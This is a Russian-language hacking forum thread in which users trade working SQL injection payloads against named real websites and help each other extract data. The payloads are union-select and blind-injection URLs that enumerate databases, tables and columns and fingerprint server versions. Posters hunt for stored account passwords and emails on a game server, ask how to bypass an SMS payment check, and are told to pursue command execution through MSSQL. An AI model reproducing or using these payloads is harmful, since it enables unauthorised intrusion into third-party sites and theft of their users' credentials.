С помощью DB_NAME(n) перебирая n я нашел еще 1)master 2)tempdb 3)model 4)msdb 5)lin2db 6)lin2comm 7)l2gloss 8)lin2world 9) lin2log 10)lin2clancomm SELECT user_name(); SELECT system_user; SELECT user; имя юзера stat и имя таблицы с помощью: DB_NAME() - имя таблицы: lin2world версия - 1 or 1=@@version-- таблицы - 1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)-- колонки - 1+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+TABLES+WHERE+TABLE_NAME+NOT+IN+('имя таблицы'))-- Проблема в том что запросы такого видв не проходят. http://darkomen.ru/?go=19&indx=2980+union+select+1,2,@@version,4,5,6,7,8,9,0,11,12-- Всю информацию я узнал только через union select. И подставлял в запрос вместо цифр DB_NAME(n) user_name() @@version.\ Можно ли с использованием union select сделать что нибудь? Плиз скажите как с ними работать и что полезного и как из них взять. Не могу понять почему удаляют пост я не там пишу что ли? Просто очень интересная для меня тема перечитал все мануалы которые нашел. но не могу понять как сделать помогите кто нить пожалусто.
Не получается раскрутить http://www.carochasolicar.com/detalhesp.php?tipo=4' Двойной запрос? Попробуйте плз, кому не лень.
Imperou$, там функции mysql_result() передается пустой результат от запроса. От того и ошибка fedi, доступа к базам л2-сервара нету http://darkomen.ru/?go=19&indx=-1+union+select+1,2,3,4,5,6,7,8,9,1,1,1+from+lin2db.user_account Его как правило и не бывает. С этими базами работает непосредственно л2-сервер
нету там фильтра на from http://darkomen.ru/?go=19&indx=-1+union+all+select+1,2,3,4,5,6,7,8,9,1,1,1+from+INFORMATION_SCHEMA.TABLES--
Подобрал поля, (25) через 'order+by', но при попытке вывести выводимое, тупо not found.Видимо фильтруется union или select. Версия пятая. http://fantasysportsinsider.com/index.php?option=com_feeds&task=headline&headline=141060+and+substring(version(),1,1)=5--&totalItems=3709&pageID=2 что можно сделать? Очень нужен совет.
http://fantasysportsinsider.com/index.php?option=com_feeds&task=headline&headline=-141060/**/union/**/select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,version(),16,17,18,19,20,21,22,23,24,25--+&totalItems=3709&pageID=2 5.0.67-community С ними работает сервер линейки я же написал. Сайт вообще мог бы быть построен на mysql и не иметь никакого отношения к л2 серверу. Впрочем иногда бывает что данные для статистики (как правило подробной, например в личном кабинете - содержимое инвентаря, количество пвп\пк) берется прямо из этих баз... здесь как видишь доступа к этим базам нету
http://www.customoutfitters.com/co_home/products.php?productCat=4 Стоит PostgreSql.Кто может раскрутить ? На все запросы к бд реагирует молча =_=
http://www.customoutfitters.com/co_home/products.php?productCat=4+and+ascii(substring((select+version()),0,1))>1 PostgreSQL 8.1.3 http://www.customoutfitters.com/co_home/products.php?productCat=4+and+ascii(substring((select+tablename+from+pg_tables+limit+1+offset+0),1,1))>1 Дальше сам
хоть я не очень дружу с MSSQL но так на вскидку: смотрим базы доступные текушему пользователю(0- нет доступа, 1 - доступ есть): PHP: http://darkomen.ru/?go=19&indx=-11+union+all+select+1,2,HAS_DBACCESS(DB_NAME(0)),4,5,6,7,DB_NAME(0),9,1,1,1-- lin2world - 1 master - 1 tempdb - 1 model - 0 msdb - 1 lin2db - 0 lin2comm - 0 l2gloss - 0 lin2world - 1 lin2log - 0 lin2clancomm - 0 смотрим таблички и колонки доступные текушему пользователю PHP: http://darkomen.ru/?go=19&indx=-1+union+select+1,2,QUOTENAME(TABLE_NAME),4,5,6,7,QUOTENAME(COLUMN_NAME),9,1,1,1+from+INFORMATION_SCHEMA.COLUMNS-- крч ничего особено хорошего нету.
Господа, помогите с таким вопросом. На чем построена система скачки файлов сайта ... допустим http://ikino.by/ ? Вот - http://ikino.by/download/ns_echelon_conspiracy_2009_dvdscr.avi.html сама система получения\верификации полученного по СМС кода. Что это за система? На чем построена? Есть ли известные способы обхода данной системы? Может кто что знает. Заранее спасибо за ответ.
__http://darkomen.ru/?go=19&indx=-1+union+select+1,2,QU OTENAME(TABLE_NAME),4,5,6,7,Q UOT ENAME(COLUMN_NAME),9,1,1,1+from+INFORMATION_SCH EMA.C O LUMNS-- может кто нить подскажет к можно пароли найти? нашел все аккаунты их ид даты создания, а поролей и ящиков нету((
Тебе же популярно все обьяснили и разжували - нету доступа к определеным БД где скорее всего и храниться пароли и мыла и тп, копай теперь в направлении выполнения команд через mssql.
